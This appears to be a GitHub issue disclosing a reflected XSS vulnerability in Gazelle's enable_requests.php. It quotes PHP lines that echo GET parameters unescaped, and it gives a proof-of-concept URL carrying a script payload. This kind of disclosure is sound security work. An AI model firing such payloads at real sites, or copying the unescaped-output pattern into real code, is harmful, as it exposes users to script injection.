Skip to content

xss_2 #130

@xjzzzxx

Description

@xjzzzxx

Hello,

I would like to report for a XSS vulnerability in gazelle commit 63b3370

In file https://github.com/WhatCD/Gazelle/blob/master/sections/tools/managers/enable_requests.php

<input type="hidden" name="view" value="<?=$_GET['view']?>" />  // Line 159
<td><input type="text" name="username" value="<?=$_GET['username']?>" /></td> // Line 164
...
// There are still many unchecked outputs

Source from $_GET['view'] without any filtering or checking which resulting in XSS.

Poc

GET sections/tools/managers/enable_requests.php?view=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22

Manual verification

2_0

2

BTW,cms.gazelle.com in local(changes hosts)

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions